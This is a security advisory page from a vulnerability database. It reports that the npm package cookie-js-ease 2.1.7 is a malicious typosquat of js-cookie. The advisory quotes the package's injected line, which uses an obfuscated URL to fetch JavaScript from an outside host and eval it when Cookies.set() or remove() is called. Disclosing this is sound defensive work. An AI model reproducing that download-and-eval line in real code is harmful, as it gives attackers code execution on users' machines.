npm

cookie-js-ease @2.1.7

Vulnerability report · Last retrieved from osv.dev July 9, 2026 at 6:28 PM UTC

Malicious

OSV ID

MAL-2026-10058

Ecosystem

npm

Summary

cookie-js-ease@2.1.7 impersonates the popular js-cookie library (same repository URL, banner comment, API surface, and reused upstream author name 'Klaus Hartl') but adds axios and request as runtime dependencies and injects a remote-code-execution branch into the CommonJS build referenced by the package's main entry (dist/cookie.ease.js). When a consumer calls Cookies.set()/remove() in a Node.js context (or with expires==0), the code executes require('axios').get(atob('aHR0cHM6Ly9jb29raWUtYXBpLXR3by52ZXJjZWwuYXBwLw')).then(r => { eval(r.data.content) }) — fetching JavaScript from https://cookie-api-two.vercel.app/ and eval'ing the response body inside the installer's Node process. The destination URL is base64-obfuscated via atob() to evade static scanners. The.mjs and.min.js variants do not contain this branch, so the payload is targeted specifically at CommonJS consumers. This is unambiguous typosquat-plus-RCE: consumers who mistype js-cookie and reach for this package receive attacker-controlled code execution on first use of the library's core API.

Source: amazon-inspector (2908ef4ab9f019d4675b39066f876acb959cd9814b47bb66f8f4554c517abe0d)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.